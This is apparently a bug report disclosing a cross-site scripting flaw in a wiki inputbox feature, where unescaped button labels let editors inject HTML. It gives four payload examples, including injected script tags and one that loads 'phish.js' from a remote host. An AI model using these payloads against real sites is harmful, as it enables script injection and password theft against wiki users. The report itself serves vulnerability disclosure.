Author: conrad.irwin
Description:
As this does no HTML escaping it is possible for editors to embed script tags in the page, with all of the security problems that that entails.
I found this problem on wiktionary and wikipedia, so I am guessing it is a universal problem.
For example...
<inputbox>
type=search
buttonlabel=Hello" onclick="alert('gotcha');return false
searchbuttonlabel=Dig deeper
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><!-- Actually this is quite useful...
searchbuttonlabel=Dig deeper--> <br class="
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript">document.body.innerHTML="You Smell";</script>
searchbuttonlabel=Oops
</inputbox>
<inputbox>
type=search
buttonlabel=Hello" /><script type="text/javascript" src="http://www.example.com/phish.js" />
searchbuttonlabel=Now you are really for it
</inputbox>
This could have dire consequences, as it would be trivial to get people's wiki passwords (in the name of the unified login scheme) or other less obvious hacks.
Version: unspecified
Severity: critical